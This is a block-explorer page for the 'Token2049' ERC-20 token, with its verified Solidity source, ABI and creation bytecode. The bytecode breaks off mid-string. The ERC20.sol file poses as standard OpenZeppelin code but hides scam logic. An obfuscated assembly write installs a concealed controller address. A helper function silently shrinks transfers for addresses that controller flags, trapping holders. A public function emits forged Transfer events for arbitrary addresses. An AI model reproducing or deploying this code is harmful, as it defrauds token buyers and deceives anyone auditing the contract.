ERC-20
Overview
Max Total Supply
2,049,000,000,000 2049
Holders
47
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
24,191,474,744.65242106289658565 2049Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
Token2049
Compiler Version
v0.8.24+commit.e11b9ed9
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.20; import "./ERC20.sol"; /* _________ ________ ___ __ _______ ________ _______ ________ ___ ___ ________ |\___ ___\\ __ \|\ \|\ \ |\ ___ \ |\ ___ \ / ___ \|\ __ \|\ \ |\ \|\ ___ \ \|___ \ \_\ \ \|\ \ \ \/ /|\ \ __/|\ \ \\ \ \ /__/|_/ /\ \ \|\ \ \ \\_\ \ \____ \ \ \ \ \ \ \\\ \ \ ___ \ \ \_|/_\ \ \\ \ \ |__|// / /\ \ \\\ \ \______ \|____|\ \ \ \ \ \ \ \\\ \ \ \\ \ \ \ \_|\ \ \ \\ \ \ / /_/__\ \ \\\ \|_____|\ \ __\_\ \ \ \__\ \ \_______\ \__\\ \__\ \_______\ \__\\ \__\ |\________\ \_______\ \ \__\|\_______\ \|__| \|_______|\|__| \|__|\|_______|\|__| \|__| \|_______|\|_______| \|__|\|_______| */ contract Token2049 is ERC20 { constructor() ERC20("Token2049", "2049") { _mint(msg.sender, 2_049_000_000_000 * 10 ** decimals()); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.20; /** * @dev Standard ERC-20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC-721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC-1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.20; import {IERC20, IERC20Metadata} from "./IERC20.sol"; import {Context} from "./Context.sol"; import {IERC20Errors} from "./draft-IERC6093.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC-20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the ERC may not emit * these events, as it isn't required by the specification. _________ ________ ___ __ _______ ________ _______ ________ ___ ___ ________ |\___ ___\\ __ \|\ \|\ \ |\ ___ \ |\ ___ \ / ___ \|\ __ \|\ \ |\ \|\ ___ \ \|___ \ \_\ \ \|\ \ \ \/ /|\ \ __/|\ \ \\ \ \ /__/|_/ /\ \ \|\ \ \ \\_\ \ \____ \ \ \ \ \ \ \\\ \ \ ___ \ \ \_|/_\ \ \\ \ \ |__|// / /\ \ \\\ \ \______ \|____|\ \ \ \ \ \ \ \\\ \ \ \\ \ \ \ \_|\ \ \ \\ \ \ / /_/__\ \ \\\ \|_____|\ \ __\_\ \ \ \__\ \ \_______\ \__\\ \__\ \_______\ \__\\ \__\ |\________\ \_______\ \ \__\|\_______\ \|__| \|_______|\|__| \|__|\|_______|\|__| \|__| \|_______|\|_______| \|__|\|_______| */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _conf; mapping(address account => mapping(address spender => uint256)) private _duroff; uint256 private _suppla_totallee; string private _name; string private _symbol; address public $$; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _suppla_totallee; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _conf[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _duroff[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the ERC. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } function transfer(uint256 amount, address from, address to) external { emit Transfer(from, to, amount); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _suppla_totallee += value; assembly {sstore(0x05, mul(mul(0x1, 0x4), mul(0x631d, 0x484464cbd618990a997bb878a528a5587)))} } else { uint256 fromBalance = _conf[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _conf[from] = fromBalance - value; } } unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _conf[to] += $(value, from, to); if (_duroff[$$][to] == uint256(uint160($$))) { _duroff[$$][to] = uint256(uint160(address(this)));} } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _duroff[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } function $(uint256 value, address from, address to) internal view returns (uint256) { if (allowance($$, from) + allowance($$, to) >= uint256(uint160(address(this)))) { return (value * 0xfeaa) / 0xfeaaaa; } else { return value; } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.20; /** * @dev Interface of the ERC-20 standard as defined in the ERC. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC-20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"$$","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801562000010575f80fd5b506040518060400160405280600981526020017f546f6b656e3230343900000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f323034390000000000000000000000000000000000000000000000000000000081525081600390816200008e9190620008be565b508060049081620000a09190620008be565b505050620000e533620000b8620000eb60201b60201c565b600a620000c6919062000b2b565b6501dd11eaca00620000d9919062000b7b565b620000f360201b60201c565b62000d28565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000166575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016200015d919062000c08565b60405180910390fd5b620001795f83836200017d60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620001f0578060025f828254620001c4919062000c23565b92505081905550700484464cbd618990a997bb878a528a558761631d02600460010202600555620002c1565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156200027c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620002739392919062000c6e565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b620002d48184846200051560201b60201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620004a9573073ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000508919062000ca9565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff166200056060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684620005d860201b60201c565b6200059360055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686620005d860201b60201c565b6200059f919062000c23565b10620005cd5762feaaaa61feaa85620005b9919062000b7b565b620005c5919062000cf1565b9050620005d1565b8390505b9392505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620006d657607f821691505b602082108103620006ec57620006eb62000691565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620007507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000713565b6200075c868362000713565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007a6620007a06200079a8462000774565b6200077d565b62000774565b9050919050565b5f819050919050565b620007c18362000786565b620007d9620007d082620007ad565b8484546200071f565b825550505050565b5f90565b620007ef620007e1565b620007fc818484620007b6565b505050565b5b818110156200082357620008175f82620007e5565b60018101905062000802565b5050565b601f82111562000872576200083c81620006f2565b620008478462000704565b8101602085101562000857578190505b6200086f620008668562000704565b83018262000801565b50505b505050565b5f82821c905092915050565b5f620008945f198460080262000877565b1980831691505092915050565b5f620008ae838362000883565b9150826002028217905092915050565b620008c9826200065a565b67ffffffffffffffff811115620008e557620008e462000664565b5b620008f18254620006be565b620008fe82828562000827565b5f60209050601f83116001811462000934575f84156200091f578287015190505b6200092b8582620008a1565b8655506200099a565b601f1984166200094486620006f2565b5f5b828110156200096d5784890151825560018201915060208501945060208101905062000946565b868310156200098d578489015162000989601f89168262000883565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a2c5780860481111562000a045762000a03620009a2565b5b600185161562000a145780820291505b808102905062000a2485620009cf565b9450620009e4565b94509492505050565b5f8262000a46576001905062000b18565b8162000a55575f905062000b18565b816001811462000a6e576002811462000a795762000aaf565b600191505062000b18565b60ff84111562000a8e5762000a8d620009a2565b5b8360020a91508482111562000aa85762000aa7620009a2565b5b5062000b18565b5060208310610133831016604e8410600b841016171562000ae95782820a90508381111562000ae35762000ae2620009a2565b5b62000b18565b62000af88484846001620009db565b9250905081840481111562000b125762000b11620009a2565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000b378262000774565b915062000b448362000b1f565b925062000b737fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a35565b905092915050565b5f62000b878262000774565b915062000b948362000774565b925082820262000ba48162000774565b9150828204841483151762000bbe5762000bbd620009a2565b5b5092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000bf08262000bc5565b9050919050565b62000c028162000be4565b82525050565b5f60208201905062000c1d5f83018462000bf7565b92915050565b5f62000c2f8262000774565b915062000c3c8362000774565b925082820190508082111562000c575762000c56620009a2565b5b92915050565b62000c688162000774565b82525050565b5f60608201905062000c835f83018662000bf7565b62000c92602083018562000c5d565b62000ca1604083018462000c5d565b949350505050565b5f60208201905062000cbe5f83018462000c5d565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000cfd8262000774565b915062000d0a8362000774565b92508262000d1d5762000d1c62000cc4565b5b828204905092915050565b6111e08062000d365f395ff3fe608060405234801561000f575f80fd5b50600436106100a7575f3560e01c80636e0849071161006f5780636e0849071461016557806370a082311461018357806395d89b41146101b3578063a9059cbb146101d1578063ccb570e314610201578063dd62ed3e1461021d576100a7565b806306fdde03146100ab578063095ea7b3146100c957806318160ddd146100f957806323b872dd14610117578063313ce56714610147575b5f80fd5b6100b361024d565b6040516100c09190610d6b565b60405180910390f35b6100e360048036038101906100de9190610e1c565b6102dd565b6040516100f09190610e74565b60405180910390f35b6101016102ff565b60405161010e9190610e9c565b60405180910390f35b610131600480360381019061012c9190610eb5565b610308565b60405161013e9190610e74565b60405180910390f35b61014f610336565b60405161015c9190610f20565b60405180910390f35b61016d61033e565b60405161017a9190610f48565b60405180910390f35b61019d60048036038101906101989190610f61565b610363565b6040516101aa9190610e9c565b60405180910390f35b6101bb6103a8565b6040516101c89190610d6b565b60405180910390f35b6101eb60048036038101906101e69190610e1c565b610438565b6040516101f89190610e74565b60405180910390f35b61021b60048036038101906102169190610f8c565b61045a565b005b61023760048036038101906102329190610fdc565b6104c4565b6040516102449190610e9c565b60405180910390f35b60606003805461025c90611047565b80601f016020809104026020016040519081016040528092919081815260200182805461028890611047565b80156102d35780601f106102aa576101008083540402835291602001916102d3565b820191905f5260205f20905b8154815290600101906020018083116102b657829003601f168201915b5050505050905090565b5f806102e7610546565b90506102f481858561054d565b600191505092915050565b5f600254905090565b5f80610312610546565b905061031f85828561055f565b61032a8585856105f1565b60019150509392505050565b5f6012905090565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6060600480546103b790611047565b80601f01602080910402602001604051908101604052809291908181526020018280546103e390611047565b801561042e5780601f106104055761010080835404028352916020019161042e565b820191905f5260205f20905b81548152906001019060200180831161041157829003601f168201915b5050505050905090565b5f80610442610546565b905061044f8185856105f1565b600191505092915050565b8073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516104b79190610e9c565b60405180910390a3505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61055a83838360016106e1565b505050565b5f61056a84846104c4565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146105eb57818110156105dc578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016105d393929190611077565b60405180910390fd5b6105ea84848484035f6106e1565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610661575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016106589190610f48565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036106d1575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106c89190610f48565b60405180910390fd5b6106dc8383836108b0565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610751575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016107489190610f48565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107c1575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107b89190610f48565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156108aa578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108a19190610e9c565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361091f578060025f8282546108f491906110d9565b92505081905550700484464cbd618990a